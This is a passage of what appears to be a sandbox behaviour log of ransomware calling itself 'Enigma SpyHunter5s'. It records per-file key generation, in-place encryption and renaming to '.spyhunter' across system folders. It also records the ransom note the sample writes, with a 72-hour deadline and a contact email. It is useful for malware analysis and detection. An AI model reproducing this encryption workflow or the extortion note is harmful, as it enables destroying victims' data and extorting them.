(x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-12.spyhunter")) returned 1 [0127.896] GetProcessHeap () returned 0x2c0000 [0127.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.896] GetProcessHeap () returned 0x2c0000 [0127.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.896] GetProcessHeap () returned 0x2c0000 [0127.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0678 | out: hHeap=0x2c0000) returned 1 [0127.896] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7b0 | out: pbBuffer=0x248f7b0) returned 1 [0127.896] GetProcessHeap () returned 0x2c0000 [0127.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.897] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7a8*=0x30) returned 1 [0127.897] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-11"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.897] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11") returned 54 [0127.897] StrStrW (lpFirst="GMT-11", lpSrch=".txt") returned 0x0 [0127.897] GetProcessHeap () returned 0x2c0000 [0127.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.897] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f76c*=0x1b, lpOverlapped=0x0) returned 1 [0127.898] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.898] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f76c*=0x1b, lpOverlapped=0x0) returned 1 [0127.898] GetProcessHeap () returned 0x2c0000 [0127.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.898] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.898] WriteFile (in: hFile=0xec, lpBuffer=0x248f7ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f76c, lpOverlapped=0x0 | out: lpBuffer=0x248f7ac*, lpNumberOfBytesWritten=0x248f76c*=0x4, lpOverlapped=0x0) returned 1 [0127.898] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f76c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f76c*=0x30, lpOverlapped=0x0) returned 1 [0127.898] CloseHandle (hObject=0xec) returned 1 [0127.898] GetProcessHeap () returned 0x2c0000 [0127.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.898] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11.spyhunter") returned 64 [0127.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-11"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-11.spyhunter")) returned 1 [0128.308] GetProcessHeap () returned 0x2c0000 [0128.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0128.309] GetProcessHeap () returned 0x2c0000 [0128.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0128.309] GetProcessHeap () returned 0x2c0000 [0128.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec05c0 | out: hHeap=0x2c0000) returned 1 [0128.309] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0128.309] WriteFile (in: hFile=0x16c, lpBuffer=0x248f6df*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f808, lpOverlapped=0x0 | out: lpBuffer=0x248f6df*, lpNumberOfBytesWritten=0x248f808*=0x127, lpOverlapped=0x0) returned 1 [0128.310] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0128.310] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f808, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f808*=0x2ac, lpOverlapped=0x0) returned 1 [0128.310] CloseHandle (hObject=0x16c) returned 1 [0128.310] GetProcessHeap () returned 0x2c0000 [0128.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5560 | out: hHeap=0x2c0000) returned 1 [0128.783] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7a0 | out: pbBuffer=0x248f7a0) returned 1 [0128.783] GetProcessHeap () returned 0x2c0000 [0128.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0128.783] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f798*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f798*=0x30) returned 1 [0128.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0128.820] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml") returned 86 [0128.820] StrStrW (lpFirst="WinFXList.xml", lpSrch=".txt") returned 0x0 [0128.820] GetProcessHeap () returned 0x2c0000 [0128.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0128.820] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f75c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f75c*=0xa12, lpOverlapped=0x0) returned 1 [0128.832] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff5ee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.832] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xa12, lpNumberOfBytesWritten=0x248f75c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f75c*=0xa12, lpOverlapped=0x0) returned 1 [0128.832] GetProcessHeap () returned 0x2c0000 [0128.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0128.832] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.832] WriteFile (in: hFile=0x17c, lpBuffer=0x248f79c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f75c, lpOverlapped=0x0 | out: lpBuffer=0x248f79c*, lpNumberOfBytesWritten=0x248f75c*=0x4, lpOverlapped=0x0) returned 1 [0128.832] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f75c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f75c*=0x30, lpOverlapped=0x0) returned 1 [0128.832] CloseHandle (hObject=0x17c) returned 1 [0128.832] GetProcessHeap () returned 0x2c0000 [0128.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0128.833] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.spyhunter") returned 96 [0128.833] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.spyhunter" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml.spyhunter")) returned 1 [0128.833] GetProcessHeap () returned 0x2c0000 [0128.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0128.833] GetProcessHeap () returned 0x2c0000 [0128.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0128.833] GetProcessHeap () returned 0x2c0000 [0128.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb140 | out: hHeap=0x2c0000) returned 1 [0128.834] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7a0 | out: pbBuffer=0x248f7a0) returned 1 [0128.834] GetProcessHeap () returned 0x2c0000 [0128.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0128.834] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f798*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f798*=0x30) returned 1 [0128.834] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\css\\currency.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.043] GetProcessHeap () returned 0x2c0000 [0129.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.043] GetProcessHeap () returned 0x2c0000 [0129.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eafcb8 | out: hHeap=0x2c0000) returned 1 [0129.043] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f798 | out: pbBuffer=0x248f798) returned 1 [0129.043] GetProcessHeap () returned 0x2c0000 [0129.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.043] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f790*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f790*=0x30) returned 1 [0129.043] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0129.044] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0129.044] StrStrW (lpFirst="qmgr0.dat", lpSrch=".txt") returned 0x0 [0129.044] GetProcessHeap () returned 0x2c0000 [0129.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.044] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f754, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f754*=0x2800, lpOverlapped=0x0) returned 1 [0129.250] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.250] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f754, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f754*=0x2800, lpOverlapped=0x0) returned 1 [0129.250] GetProcessHeap () returned 0x2c0000 [0129.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.250] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.251] WriteFile (in: hFile=0x120, lpBuffer=0x248f794*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f754, lpOverlapped=0x0 | out: lpBuffer=0x248f794*, lpNumberOfBytesWritten=0x248f754*=0x4, lpOverlapped=0x0) returned 1 [0129.252] WriteFile (in: hFile=0x120, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f754, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f754*=0x30, lpOverlapped=0x0) returned 1 [0129.252] CloseHandle (hObject=0x120) returned 1 [0129.252] GetProcessHeap () returned 0x2c0000 [0129.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.252] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.spyhunter") returned 67 [0129.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.spyhunter" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat.spyhunter")) returned 1 [0129.253] GetProcessHeap () returned 0x2c0000 [0129.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.253] GetProcessHeap () returned 0x2c0000 [0129.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.253] GetProcessHeap () returned 0x2c0000 [0129.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea99b8 | out: hHeap=0x2c0000) returned 1 [0129.253] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f798 | out: pbBuffer=0x248f798) returned 1 [0129.253] GetProcessHeap () returned 0x2c0000 [0129.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.253] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f790*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f790*=0x30) returned 1 [0129.253] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0129.254] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned 58 [0129.254] StrStrW (lpFirst="DocumentRepository.ico", lpSrch=".txt") returned 0x0 [0129.254] GetProcessHeap () returned 0x2c0000 [0129.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.254] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f754, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f754*=0x2800, lpOverlapped=0x0) returned 1 [0129.256] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.256] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f754, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f754*=0x2800, lpOverlapped=0x0) returned 1 [0129.257] GetProcessHeap () returned 0x2c0000 [0129.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.257] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.257] WriteFile (in: hFile=0x120, lpBuffer=0x248f794*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f754, lpOverlapped=0x0 | out: lpBuffer=0x248f794*, lpNumberOfBytesWritten=0x248f754*=0x4, lpOverlapped=0x0) returned 1 [0129.257] WriteFile (in: hFile=0x120, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f754, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f754*=0x30, lpOverlapped=0x0) returned 1 [0129.257] CloseHandle (hObject=0x120) returned 1 [0129.258] GetProcessHeap () returned 0x2c0000 [0129.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.258] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.spyhunter") returned 68 [0129.258] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico.spyhunter")) returned 1 [0129.258] GetProcessHeap () returned 0x2c0000 [0129.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.258] GetProcessHeap () returned 0x2c0000 [0129.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.259] GetProcessHeap () returned 0x2c0000 [0129.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9538 | out: hHeap=0x2c0000) returned 1 [0129.259] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f790 | out: pbBuffer=0x248f790) returned 1 [0129.259] GetProcessHeap () returned 0x2c0000 [0129.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.259] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f788*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f788*=0x30) returned 1 [0129.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0129.284] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned 52 [0129.284] StrStrW (lpFirst="AssetLibrary.ico", lpSrch=".txt") returned 0x0 [0129.284] GetProcessHeap () returned 0x2c0000 [0129.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.284] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f74c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f74c*=0x1536, lpOverlapped=0x0) returned 1 [0129.356] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffeaca, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.356] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1536, lpNumberOfBytesWritten=0x248f74c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f74c*=0x1536, lpOverlapped=0x0) returned 1 [0129.356] GetProcessHeap () returned 0x2c0000 [0129.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.356] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.356] WriteFile (in: hFile=0x170, lpBuffer=0x248f78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f74c, lpOverlapped=0x0 | out: lpBuffer=0x248f78c*, lpNumberOfBytesWritten=0x248f74c*=0x4, lpOverlapped=0x0) returned 1 [0129.356] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f74c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f74c*=0x30, lpOverlapped=0x0) returned 1 [0129.356] CloseHandle (hObject=0x170) returned 1 [0129.357] GetProcessHeap () returned 0x2c0000 [0129.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0129.357] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.spyhunter") returned 62 [0129.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico.spyhunter")) returned 1 [0129.357] GetProcessHeap () returned 0x2c0000 [0129.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0129.357] GetProcessHeap () returned 0x2c0000 [0129.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.357] GetProcessHeap () returned 0x2c0000 [0129.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1d78 | out: hHeap=0x2c0000) returned 1 [0129.358] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f790 | out: pbBuffer=0x248f790) returned 1 [0129.358] GetProcessHeap () returned 0x2c0000 [0129.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.358] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f788*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f788*=0x30) returned 1 [0129.358] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0129.358] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned 71 [0129.359] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0129.359] GetProcessHeap () returned 0x2c0000 [0129.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.359] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f74c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f74c*=0x2800, lpOverlapped=0x0) returned 1 [0129.387] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.387] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f74c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f74c*=0x2800, lpOverlapped=0x0) returned 1 [0129.388] GetProcessHeap () returned 0x2c0000 [0129.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.388] 